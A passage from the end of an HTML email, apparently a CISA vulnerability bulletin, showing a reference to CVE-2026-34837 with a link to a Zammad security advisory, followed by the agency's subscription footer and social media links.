<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34837" target=3D= "_blank" rel=3D"noopener">CVE-2026-34837</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-89vv-6= 639-wcv8" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-89vv-6639-wcv8</a><br>=C2=A0</td>
</tr>
</tbody>
</table>
<p><a href=3D"#top">Back to top</a></p>
</div>
<p>n/a</p>
</div>
</div>
<style>body {
font-size: 1em; font-family: Arial, Verdana, sans-serif; font-weight: norma=
l; font-style: normal; color: #333333;
}
</style>
=20


<div id=3D"mail_footer">
<p style=3D"text-align: center;"><span style=3D"font-size: 10.0pt; colo=
r: #757575;">Having trouble viewing this message?=C2=A0</span><a href=3D"ht= tps://content.govdelivery.com/accounts/USDHSCISA/bulletins/412cde5" target= =3D"_blank" rel=3D"noopener">View it as a webpage</a>.=C2=A0<a href=3D"http= s://content.govdelivery.com/accounts/USDHS/bulletins/292141e" target=3D"_bl= ank" rel=3D"noopener"></a><span style=3D"font-size: 10.0pt; color: #757575;= "></span></p>
<p style=3D"text-align: center;"><span style=3D"font-size: 10.0pt; color: #= 757575;">You are subscribed to updates from the </span><a href=3D"https://w= ww.cisa.gov"><span style=3D"font-size: 10.0pt;">Cybersecurity and Infrastru= cture Security Agency</span></a><span style=3D"font-size: 10.0pt; color: #7= 57575;"> (CISA)<br></span><a href=3D"https://public.govdelivery.com/account= s/USDHSCISA/subscriber/edit?preferences=3Dtrue#tab1" target=3D"_blank" rel= =3D"noopener"><span style=3D"font-size: 10.0pt; color: #00568c;">Manage Sub= scriptions</span></a>=C2=A0=C2=A0<span style=3D"font-size: 10.0pt; color: #= 757575;">|=C2=A0=C2=A0</span><a href=3D"https://www.cisa.gov/privacy-policy=
" target=3D"_blank" rel=3D"noopener"><span style=3D"font-size: 10.0pt; colo=
r: #00568c;">Privacy Policy</span></a><span style=3D"font-size: 10.0pt; col= or: #757575;">=C2=A0=C2=A0|=C2=A0 <a href=3D"https://subscriberhelp.granicu= s.com/s/article/Subscriber-Help-Center" target=3D"_blank" rel=3D"noopener">= Help</a><a href=3D"https://insights.govdelivery.com/Communications/Subscrib= er_Help_Center" target=3D"_blank" rel=3D"noopener"></a></span><span style= =3D"font-size: 10.0pt; color: #757575;"></span></p>
<p style=3D"text-align: center;"><span style=3D"font-size: 10.0pt; color: #= 757575;">Connect with CISA: <br></span><a href=3D"https://www.facebook.com/= CISA" target=3D"_blank" rel=3D"noopener"><span style=3D"font-size: 10.0pt; = color: #00568c;">Facebook</span></a><span style=3D"font-size: 10.0pt; color=
: #757575;">=C2=A0 |=C2=A0 </span><a href=3D"https://twitter.com/CISAgov" t= arget=3D"_blank" rel=3D"noopener"><span style=3D"font-size: 10.0pt; color: = #00568c;">Twitter</span></a><span style=3D"font-size: 10.0pt; color: #75757= 5;">=C2=A0 |=C2=A0 </span><a href=3D"https://Instagram.com/cisagov" target= =3D"_blank" rel=3D"noopener"><span style=3D"font-size: 10.0pt; color: #0056= 8c;">Instagram</span></a><span style=3D"font-size: 10.0pt; color: #757575;"= >=C2=A0 |=C2=A0 </span><a href=3D"https://www.linkedin.com/company/cybersec= urity-and-infrastructure-security-agency" target=3D"_blank" rel=3D"noopener= "><span style=3D"font-size: 10.0pt; color: #00568c;">LinkedIn</span></a><sp=
an style=3D"font-size: 10.0pt; color: #757575;">=C2=A0 |=C2=A0=C2=A0 </span= ><a href=3D"https://www.youtube.com/channel/UCxyq9roe-npgzrVwbpoAy0A" targe= t=3D"_self"><span style=3D"font-size: 10.0pt; color: #00568c;">YouTube</spa= n></a><span style=3D"font-size: 10.0pt; color: #757575;"></span></p>

</div>
<div id=3D"tagline">
<hr>
<table style=3D"width: 100%;" border=3D"0" cellspacing=3D"0" cellpadding=3D=

<tbody>

<td style=3D"color: #757575; font-size: 10px; font-family: Arial;" width=3D= "89%">This email was sent to cisa@toolazy.synchro.net using GovDelivery Com= munications Cloud, on behalf of: Cybersecurity and Infrastructure Security = Agency =C2=B7 707 17th St, Suite 4000 =C2=B7 Denver, CO 80202</td>
<td align=3D"right" width=3D"11%"><a href=3D"https://subscriberhelp.granicu= s.com/" target=3D"_blank" rel=3D"noopener"><img src=3D"https://content.govd= elivery.com/images/govd-logo-dark.png" border=3D"0" alt=3D"GovDelivery logo=
" width=3D"115"></a></td>
</tr>
</tbody>
</table>
<style type=3D"text/css">body .abe-column-block { min-height: 5px; } table.= gd_combo_table img {margin-left:10px; margin-right:10px;} table.gd_combo_ta= ble div.govd_image_display img, table.gd_combo_table td.gd_combo_image_cell=
img {margin-left:0px; margin-right:0px;}</style>

</div>
</td>
</tr>
</table>

<img alt=3D"" src=3D"https://links-2.govdelivery.com/CI0/0101019d8bd793b3-a= 587347c-6d19-4a74-a02a-41e0466a508a-000000/3hASrEI-G9Hn2Vp47N-VhEUv2JMFepii= K07rKuX5l8E=3D452" style=3D"display: none; width: 1px; height: 1px;">
</body>
</html>

--===============2735279975235001205==--

--===============3473165674994229290==--